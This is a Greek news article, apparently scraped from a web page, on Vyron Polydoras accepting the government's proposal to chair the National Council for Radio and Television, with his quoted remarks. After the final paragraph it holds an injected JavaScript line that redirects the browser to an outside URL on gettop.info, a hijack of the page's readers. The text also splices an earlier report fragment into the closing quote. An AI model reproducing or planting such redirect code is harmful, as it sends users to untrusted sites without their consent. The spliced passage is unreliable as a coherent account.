Ο Β. Πολύδωρας η κυβερνητική πρόταση για το ΕΣΡ – Θέλω να είμαι παράγων θεσμικής εξομάλυνσης (ΒΙΝΤΕΟ)

0
18

 

Ο Βύρων Πολύδωρας, πρώην υπουργός επί κυβερνήσεως ΝΔ και πρόεδρος της Βουλής, είναι κι επίσημα η πρόταση της κυβέρνησης για την προεδρία του ΕΣΡ. Όπως ανακοίνωσε ο ίδιος σε δηλώσεις του έξω από το Μέγαρο Μαξίμου, μετά τη συνάντηση που είχε με τον πρωθυπουργό Αλέξη Τσίπρα και τον πρόεδρο της Βουλής Νίκο Βούτση δέχθηκε την πρόταση να είναι ο πρόεδρος του ΕΣΡ.

Ο κ. Πολύδωρας μιλώντας στους δμηοσιογράφους έξω από το Μέγαρο Μαξίμου, είπε ότι έθεσε ως προϋπόθεση να συγκροτηθεί το ΕΣΡ με όλες τις αρμοδιότητες που προβλέπει το Σύνταγμα τονίζοντας ότι αυτό είναι ένα καίριο σημείο, πρόταση που όπως είπε έγινε δεκτή από τον πρωθυπουργό και τον πρόεδρο της Βουλής.

https://www.youtube.com/watch?v=CgNgU31pbtU

«Εννοείται ότι στην επαναφορά των αρμοδιοτήτων στο ΕΣΡ περιλαμβάνεται και η διεξαγωγή του διαγωνισμού» συμπλήρωσε ο κ. Πολύδωρας.

Σε ερώτηση αν με όσα λέει ζητά την απόσυρση του νόμου Παππά ο πρώην βουλευτής της ΝΔ απάντησε ότι «μου είναι αδιάφορο».

Ο κ. Πολύδωρας χαρακτήρισε την κατάσταση που έχει δημιουργηθεί για τις τηλεοπτικές άδειες ως «βραχυκύκλωμα» και έκανε λόγο για «τιμητική πρόταση».

Ερωτηθείς για την αντίδραση της Νέας Δημοκρατίας η οποία λίγο πριν από την είσοδό του στο Μαξίμου εξέδωσε ανακοίνωση με την οποία κατηγόρησε την κυβέρνηση για «επικοινωνιακά παιχνίδια», ο Βύρων Πολύδωρας είπε ότι «εγώ δεν κάνω επικοινωνιακά παιχνίδια ούτε είδα στο πνεύμα τάση για επικοινωνιακά τεχνάσματα αλλά τάση για συναίνεση που είναι και προϋπόθεση της δικής μου παρεμβάσεως».

Είπε, δε, ότι επιθυμία του είναι να επικοινωνήσει με όλους τους αρχηγούς των κομμάτων και να εκθέσω τις απόψεις μου στον ΠτΔ με πνεύμα συναινετικό.

«Θέλω να είμαι παράγοντας θεσμικής εξομάλυνσης» κατέληξε ο κ. Πολύδωρας.έφθασε στο Μέγαρο Μαξίμου, όπου πληροφορίες θέλουν να του τεθει κι επίσημα η πρόταση ώστε να συζητήσουν επ’ αυτής.

Με την πρόταση του Βύρωνα Πολύδωρα στη θέση του προέδρου του Εθνικού Συμβουλίου Ραδιοτηλεόρασης η κυβέρνηση εκτιμά ότι θα «αναγκάσει» τη ΝΔ να υποχωρήσει στο θέμα της συγκρότησης του Συμβουλίου. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here